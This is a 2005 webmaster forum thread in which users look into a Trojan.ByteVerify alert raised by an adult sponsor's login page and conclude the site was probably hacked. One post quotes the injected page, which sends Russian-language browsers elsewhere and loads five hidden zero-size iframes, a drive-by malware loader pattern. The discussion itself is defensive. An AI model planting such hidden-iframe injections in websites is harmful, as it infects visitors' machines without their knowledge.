Trojan in webmaster area???

frankthetank · 2005-02-19, 09:00 AM

Ever heard of a sponsor which uses trojans in his webmaster area?

I just cleaned my system and when I finished that, I visited some sponsors to check stats.

Once I went to a sponsor, I got a virus alert. Kind of trojan for java virtual machine.

Is it really the sponsor or could it be me, maybe I didn´t delete all those viruses before?

swedguy · 2005-02-19, 09:05 AM

Post the URL here and I'll check it out. Then we can rule out if it's your machine or not.

frankthetank · 2005-02-19, 09:07 AM

Quote:

Originally Posted by swedguy

Post the URL here and I'll check it out. Then we can rule out if it's your machine or not.

http://www.dollars4babes.com/mpa2/webmasters/index.php

Just went again to the loginpage (I had cleaned the java runtime before) and got the virus alert again.

swedguy · 2005-02-19, 09:09 AM

Yep. I got it too.

Trojan.ByteVerify

swedguy · 2005-02-19, 09:10 AM

http://securityresponse.symantec.com...yteverify.html

Trojan.ByteVerify is a Trojan Horse that exploits the vulnerability described in Microsoft Security Bulletin MS03-011 and could provide a hacker the ability to run arbitrary code on an infected system.

frankthetank · 2005-02-19, 09:11 AM

Quote:

Originally Posted by swedguy

Yep. I got it too.

Trojan.ByteVerify

Exactly that´s it. I don´t like that shit. Don´t know why this is done. or is it just an accident?

Cleo · 2005-02-19, 09:13 AM

It tries to tell me that I'm not Win32 compliant except that page is 404 on their server. LOL

frankthetank · 2005-02-19, 09:16 AM

Quote:

Originally Posted by Cleo

It tries to tell me that I'm not Win32 compliant except that page is 404 on their server. LOL

I don´t think it´s funny at all. I just got listed with some freesites promoting them and if I send the surfer to trojans that won´t be good for the reputation of my sites.

On the other hand...

Cleo · 2005-02-19, 09:21 AM

It tries to load this page
http://aseger.info/

That page has this on it.
<html>
<script language="JavaScript">
if (navigator.browserLanguage == 'ru' || navigator.systemLanguage == 'ru' || navigator.userLanguage == 'ru') document.location = "home.html";
</script>
<iframe src="/index1.htm" width="0" height="0"></iframe>
<iframe src="/index2.htm" width="0" height="0"></iframe>
<iframe src="/index3.htm" width="0" height="0"></iframe>
<iframe src="/index5.htm" width="0" height="0"></iframe>
<iframe src="/index6.htm" width="0" height="0"></iframe>
</body>
</html>

I'm guessing that they have been hacked since it is all iframe crap and the whois is different then their domain. I'm on a Mac so none of this affects my computer.

swedguy · 2005-02-19, 09:24 AM

I just tried 6 of their hosted galleries and I get the same trojan warning there

Ramster · 2005-02-19, 09:48 AM

That's not good!!!!!

frankthetank · 2005-02-19, 11:17 AM

Quote:

Originally Posted by Cleo

It tries to load this page
http://aseger.info/

That page has this on it.
<html>
<script language="JavaScript">
if (navigator.browserLanguage == 'ru' || navigator.systemLanguage == 'ru' || navigator.userLanguage == 'ru') document.location = "home.html";
</script>
<iframe src="/index1.htm" width="0" height="0"></iframe>
<iframe src="/index2.htm" width="0" height="0"></iframe>
<iframe src="/index3.htm" width="0" height="0"></iframe>
<iframe src="/index5.htm" width="0" height="0"></iframe>
<iframe src="/index6.htm" width="0" height="0"></iframe>
</body>
</html>

I'm guessing that they have been hacked since it is all iframe crap and the whois is different then their domain. I'm on a Mac so none of this affects my computer.

I loved my old Mac. Think to change again.

frankthetank · 2005-02-19, 11:20 AM

I sent them an e-mail and will wait until they reply.

Cleo · 2005-02-19, 11:52 AM

Quote:

Originally Posted by frankthetank

I loved my old Mac. Think to change again.

If you were on the old Mac Classic then you will be absolutely delighted by Mac OS X.

No virtues, no spywear, no worms, never crashes, and runs all the Adobe, Macromedia, and all the other lager software apps plus much of the Linux open source stuff link Gimp, Open Office, etc.

cd34 · 2005-02-19, 12:11 PM

Quote:

Originally Posted by Cleo

No virtues, no spywear, no worms, never

I always love OSes with no virtues.

Cleo · 2005-02-19, 12:18 PM

A operator error has accord. Replace operator and press any key.

Useless · 2005-02-19, 12:31 PM

Quote:

Originally Posted by Cleo

No virtues, no spywear, no worms, never crashes, and runs all the Adobe, Macromedia, and all the other lager software apps plus much of the Linux open source stuff link Gimp, Open Office, etc.

I'm betting OS X smokes a lot of pot too.

RawAlex · 2005-02-19, 01:57 PM

That looks like the IFRAME stuff from our friend that keeps coming here offering 35 per 1000 installs. It's all crap. They install the small trojan to open the door, then they ram as much crap as possible through the open hole, hoping some of it stays in place.

I would HIGHLY recommend you remove all this sponsors hosted galleries and such from rotation at least temporarily until they get it fixed. It is truly an annoying thing.

Alex

Cleo · 2005-02-19, 02:02 PM

Quote:

Originally Posted by Useless Warrior

I'm betting OS X smokes a lot of pot too.

Mine dispenses two different types of intoxicating fluids when I get real creative on it.

Where did I put the bug powder…

frankthetank · 2005-02-19, 03:59 PM

Quote:

Originally Posted by RawAlex

That looks like the IFRAME stuff from our friend that keeps coming here offering 35 per 1000 installs. It's all crap. They install the small trojan to open the door, then they ram as much crap as possible through the open hole, hoping some of it stays in place.

I would HIGHLY recommend you remove all this sponsors hosted galleries and such from rotation at least temporarily until they get it fixed. It is truly an annoying thing.

Alex

I removed all galleries. Problem is the freesite thing. Can I change sponsors or do I risk getting banned?

On the other side installing trojans isn´t very nice.

Didn´t get a reply from the sponsor yet. Does anybody know if they are posting on gfy or so?

Cleo · 2005-02-19, 04:15 PM

Changing out your ads and keeping the same layout should not be a problem with your free sites.

swedguy · 2005-02-19, 04:15 PM

What was the deal with Dollars4Babes some time ago?

I remember looking into them and their doings a little closer. But I don't remember why.

frankthetank · 2005-02-19, 04:23 PM

Quote:

Originally Posted by Cleo

Changing out your ads and keeping the same layout should not be a problem with your free sites.

OK, I´ll do it during the night. Thank´s. And I had a little look on the new Mac and the next machine I´ll replace will be replaced by a mac. Especially videoediting seems to be far better....

frankthetank · 2005-02-19, 04:26 PM

Quote:

Originally Posted by swedguy

What was the deal with Dollars4Babes some time ago?

I remember looking into them and their doings a little closer. But I don't remember why.

They offer some sites with european models, especially UK and Czech. And one of their sites is "the mask", which gives the user the chance to appear as a performer.

BlueQuartz · 2005-02-19, 09:05 PM

thanks for the heads up

2005-02-19, 09:00 AM	#1
frankthetank Stupid risks make life worth living Join Date: Jan 2005 Location: Renesse NL Posts: 386	Trojan in webmaster area??? Ever heard of a sponsor which uses trojans in his webmaster area? I just cleaned my system and when I finished that, I visited some sponsors to check stats. Once I went to a sponsor, I got a virus alert. Kind of trojan for java virtual machine. Is it really the sponsor or could it be me, maybe I didn´t delete all those viruses before?

2005-02-19, 09:13 AM	#7
Cleo Subversive filth of the hedonistic decadent West Join Date: Mar 2003 Location: Southeast Florida Posts: 27,936	It tries to tell me that I'm not Win32 compliant except that page is 404 on their server. LOL __________________ Free Rides on Uber and Lyft Uber Car: uberTzTerri Lyft Car: TZ896289

2005-02-19, 09:21 AM	#9
Cleo Subversive filth of the hedonistic decadent West Join Date: Mar 2003 Location: Southeast Florida Posts: 27,936	It tries to load this page http://aseger.info/ That page has this on it. <html> <script language="JavaScript"> if (navigator.browserLanguage == 'ru' \|\| navigator.systemLanguage == 'ru' \|\| navigator.userLanguage == 'ru') document.location = "home.html"; </script> <iframe src="/index1.htm" width="0" height="0"></iframe> <iframe src="/index2.htm" width="0" height="0"></iframe> <iframe src="/index3.htm" width="0" height="0"></iframe> <iframe src="/index5.htm" width="0" height="0"></iframe> <iframe src="/index6.htm" width="0" height="0"></iframe> </body> </html> I'm guessing that they have been hacked since it is all iframe crap and the whois is different then their domain. I'm on a Mac so none of this affects my computer. __________________ Free Rides on Uber and Lyft Uber Car: uberTzTerri Lyft Car: TZ896289

2005-02-19, 09:48 AM	#11
Ramster Life is good Join Date: Apr 2003 Location: Ottawa, Canada Posts: 11,867	That's not good!!!!! __________________ Pornstar Legends \| Live Cam Model Shows \| Hungarian Girls Skype: robmurray999

2005-02-19, 12:18 PM	#16
Cleo Subversive filth of the hedonistic decadent West Join Date: Mar 2003 Location: Southeast Florida Posts: 27,936	A operator error has accord. Replace operator and press any key. __________________ Free Rides on Uber and Lyft Uber Car: uberTzTerri Lyft Car: TZ896289

2005-02-19, 09:05 AM	#2
swedguy Vagabond Join Date: Aug 2003 Posts: 2,374	Post the URL here and I'll check it out. Then we can rule out if it's your machine or not.

2005-02-19, 09:09 AM	#4
swedguy Vagabond Join Date: Aug 2003 Posts: 2,374	Yep. I got it too. Trojan.ByteVerify

2005-02-19, 09:10 AM	#5
swedguy Vagabond Join Date: Aug 2003 Posts: 2,374	http://securityresponse.symantec.com...yteverify.html Trojan.ByteVerify is a Trojan Horse that exploits the vulnerability described in Microsoft Security Bulletin MS03-011 and could provide a hacker the ability to run arbitrary code on an infected system.

2005-02-19, 09:24 AM	#10
swedguy Vagabond Join Date: Aug 2003 Posts: 2,374	I just tried 6 of their hosted galleries and I get the same trojan warning there

2005-02-19, 11:20 AM	#13
frankthetank Stupid risks make life worth living Join Date: Jan 2005 Location: Renesse NL Posts: 386	I sent them an e-mail and will wait until they reply.

2005-02-19, 01:57 PM	#18
RawAlex Took the hint. Join Date: Mar 2003 Posts: 5,597	That looks like the IFRAME stuff from our friend that keeps coming here offering 35 per 1000 installs. It's all crap. They install the small trojan to open the door, then they ram as much crap as possible through the open hole, hoping some of it stays in place. I would HIGHLY recommend you remove all this sponsors hosted galleries and such from rotation at least temporarily until they get it fixed. It is truly an annoying thing. Alex

2005-02-19, 04:15 PM	#21
Cleo Subversive filth of the hedonistic decadent West Join Date: Mar 2003 Location: Southeast Florida Posts: 27,936	Changing out your ads and keeping the same layout should not be a problem with your free sites. __________________ Free Rides on Uber and Lyft Uber Car: uberTzTerri Lyft Car: TZ896289

2005-02-19, 09:05 PM	#25
BlueQuartz The only guys who wear Hawaiian shirts are gay guys and big fat party animals Join Date: Jun 2004 Posts: 175	thanks for the heads up __________________ THE BIGGEST LIST OF EPASSPORTE SPONSORS YOU HAVE EVER SEEN